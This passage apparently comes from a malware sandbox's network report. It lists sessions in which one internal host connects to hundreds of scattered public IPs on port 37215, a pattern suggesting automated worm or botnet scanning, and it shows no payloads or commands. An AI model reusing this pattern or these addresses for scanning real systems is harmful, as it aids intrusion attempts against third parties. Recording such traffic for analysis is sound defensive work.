                                                  7895192.168.2.135878638.135.137.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7896192.168.2.1352394124.253.118.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7897192.168.2.134196213.146.89.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7898192.168.2.1344318157.232.205.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7899192.168.2.1354140157.214.104.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7900192.168.2.133589241.144.205.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7901192.168.2.135793413.146.183.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7902192.168.2.1340984157.77.109.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7903192.168.2.1338436157.215.66.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7904192.168.2.1338006197.141.93.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7905192.168.2.135589641.41.128.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7906192.168.2.1350974157.180.175.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7907192.168.2.1342284157.64.194.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7908192.168.2.1356358157.33.67.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7909192.168.2.135811831.9.235.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7910192.168.2.1346356197.13.50.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7911192.168.2.1347754197.193.68.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7912192.168.2.1346714185.74.133.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7913192.168.2.133570241.13.23.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7914192.168.2.1346896157.239.19.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7915192.168.2.136018641.29.83.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7916192.168.2.1356690157.30.114.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7917192.168.2.1355290197.12.191.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7918192.168.2.134210441.151.190.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7919192.168.2.1339832157.212.36.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7920192.168.2.1358554157.254.172.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7921192.168.2.135675441.3.8.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7922192.168.2.135665041.158.103.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7923192.168.2.1340644157.99.17.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7924192.168.2.1343314157.129.90.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7925192.168.2.1333786197.29.161.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7926192.168.2.134525483.59.154.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7927192.168.2.1339352197.5.100.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7928192.168.2.1337392157.105.238.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7929192.168.2.1333106157.166.180.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7930192.168.2.135094649.241.153.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7931192.168.2.1351896131.211.49.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7932192.168.2.1355592157.116.99.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7933192.168.2.1343528157.232.59.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7934192.168.2.1356988157.114.30.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7935192.168.2.1334736197.153.222.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7936192.168.2.136010041.235.95.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7937192.168.2.1351194158.39.243.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7938192.168.2.134939278.175.67.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7939192.168.2.1339258157.67.179.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7940192.168.2.1355372157.177.101.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7941192.168.2.134905441.25.140.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7942192.168.2.134570841.136.222.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7943192.168.2.1334210170.62.158.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7944192.168.2.1341444157.134.121.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7945192.168.2.1349620197.28.198.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7946192.168.2.135508641.122.104.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7947192.168.2.1341674144.58.162.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7948192.168.2.135184641.94.232.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7949192.168.2.1339716157.55.54.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7950192.168.2.133641431.65.4.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7951192.168.2.134710440.159.251.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7952192.168.2.1339990197.136.206.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7953192.168.2.1337996197.228.238.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7954192.168.2.1352576222.58.117.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7955192.168.2.13561061.221.7.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7956192.168.2.1333952154.168.55.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7957192.168.2.1344350195.72.221.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7958192.168.2.1336626157.240.112.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7959192.168.2.1338722157.186.101.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7960192.168.2.1340780197.183.225.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7961192.168.2.133588477.53.28.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7962192.168.2.1338010208.22.90.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7963192.168.2.1354966161.161.231.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7964192.168.2.135258690.201.11.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7965192.168.2.1332948163.92.229.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7966192.168.2.1336572136.192.97.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7967192.168.2.134298841.126.154.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7968192.168.2.1345210108.215.245.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7969192.168.2.134541898.127.191.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7970192.168.2.1354086157.214.120.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7971192.168.2.1357200197.6.41.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7972192.168.2.1348280157.125.192.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7973192.168.2.134998441.194.141.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7974192.168.2.1339886157.57.146.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7975192.168.2.1360780197.69.239.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7976192.168.2.1338556188.57.166.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7977192.168.2.135604013.15.12.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7978192.168.2.1346714197.31.232.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7979192.168.2.133529241.16.107.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7980192.168.2.134445441.39.248.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7981192.168.2.1356952157.21.164.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7982192.168.2.1333934157.227.96.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7983192.168.2.134300641.225.131.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7984192.168.2.1341816197.246.154.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7985192.168.2.1343862139.2.249.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7986192.168.2.1348334179.233.173.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7987192.168.2.1333254217.34.247.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7988192.168.2.1349204157.163.33.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7989192.168.2.1351272197.232.57.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7990192.168.2.1335764157.52.111.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7991192.168.2.1335102220.123.138.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7992192.168.2.1339218197.143.234.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7993192.168.2.134803441.11.143.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7994192.168.2.135861041.108.14.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7995192.168.2.1339160178.188.84.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7996192.168.2.1349698197.36.53.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7997192.168.2.134870441.175.35.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7998192.168.2.1348038197.113.138.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7999192.168.2.135483041.129.211.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8000192.168.2.135414035.226.251.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8001192.168.2.134031841.85.188.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8002192.168.2.134992478.159.131.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8003192.168.2.1336338157.129.159.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8004192.168.2.1334382220.134.92.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8005192.168.2.134382041.101.20.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8006192.168.2.135876841.248.5.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8007192.168.2.1338238157.161.208.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8008192.168.2.1344304157.224.41.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8009192.168.2.134084239.15.188.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8010192.168.2.1352660197.232.173.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8011192.168.2.133361424.82.63.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8012192.168.2.133485441.23.246.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8013192.168.2.1335680157.241.232.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8014192.168.2.1348390128.35.210.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8015192.168.2.1345778159.72.252.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8016192.168.2.1359938157.38.244.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8017192.168.2.135435841.250.14.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8018192.168.2.1343200197.213.111.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8019192.168.2.1349292197.19.26.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8020192.168.2.1358634197.119.185.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8021192.168.2.1334912157.225.43.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8022192.168.2.1338180197.3.252.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8023192.168.2.135051241.251.20.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8024192.168.2.1350990197.230.74.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8025192.168.2.1359666152.62.208.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8026192.168.2.1346094197.97.178.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8027192.168.2.136017641.141.166.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8028192.168.2.1341002157.36.66.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8029192.168.2.1351668157.15.124.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8030192.168.2.1354222125.17.57.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8031192.168.2.1352894197.218.98.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8032192.168.2.1360126197.186.23.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8033192.168.2.1347318149.141.228.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8034192.168.2.1340696167.198.123.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8035192.168.2.1356882157.239.103.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8036192.168.2.1359410197.64.47.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8037192.168.2.1360780157.184.103.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8038192.168.2.133695241.35.129.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8039192.168.2.133285041.55.92.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8040192.168.2.1348640197.173.222.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8041192.168.2.134070827.77.230.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8042192.168.2.135529241.122.13.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8043192.168.2.1355230208.71.205.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8044192.168.2.134794658.108.247.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8045192.168.2.1355302157.53.216.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8046192.168.2.135424241.204.181.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8047192.168.2.1358408157.135.147.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8048192.168.2.133292841.132.241.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8049192.168.2.1353850118.229.192.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8050192.168.2.1344208197.239.20.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8051192.168.2.1342512157.128.178.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8052192.168.2.1349638197.154.50.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8053192.168.2.135921041.179.135.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8054192.168.2.133624641.0.12.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8055192.168.2.135799841.218.142.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8056192.168.2.1356920157.33.46.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8057192.168.2.1352238197.4.134.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8058192.168.2.1355356157.227.10.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8059192.168.2.1339298197.184.63.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8060192.168.2.1344748157.113.252.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8061192.168.2.133764299.146.74.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8062192.168.2.1357120157.86.198.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8063192.168.2.1351058145.171.197.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8064192.168.2.1346164157.48.97.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8065192.168.2.1350994177.242.102.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8066192.168.2.133670641.89.244.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8067192.168.2.1357712157.241.211.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8068192.168.2.133305041.189.11.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8069192.168.2.1356982157.2.69.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8070192.168.2.133621241.24.54.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8071192.168.2.133974641.230.111.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8072192.168.2.1352162197.234.211.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8073192.168.2.133570089.251.0.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8074192.168.2.1348202197.108.244.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8075192.168.2.1350080157.232.156.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8076192.168.2.1340798114.244.64.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8077192.168.2.135702841.242.27.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8078192.168.2.134403441.91.119.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8079192.168.2.1333414129.153.252.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8080192.168.2.134596441.8.42.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8081192.168.2.134931641.68.223.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8082192.168.2.134537841.66.122.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8083192.168.2.1334798197.150.223.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8084192.168.2.1350862197.43.35.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8085192.168.2.135940641.76.174.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8086192.168.2.1356966197.251.134.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8087192.168.2.1338606197.226.174.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8088192.168.2.1338676157.207.121.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8089192.168.2.134754841.83.35.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8090192.168.2.134185641.205.32.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8091192.168.2.135967641.29.211.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8092192.168.2.1353796197.254.2.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8093192.168.2.1356580157.83.251.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8094192.168.2.1338134157.195.115.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8095192.168.2.1343426218.124.170.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8096192.168.2.1335004145.218.186.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8097192.168.2.1335400172.123.224.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8098192.168.2.1344948202.40.114.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8099192.168.2.1356644166.196.91.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8100192.168.2.1338588156.103.110.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8101192.168.2.134884241.54.250.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8102192.168.2.1334100157.2.102.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8103192.168.2.134970685.134.21.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8104192.168.2.1359388157.189.19.10737215
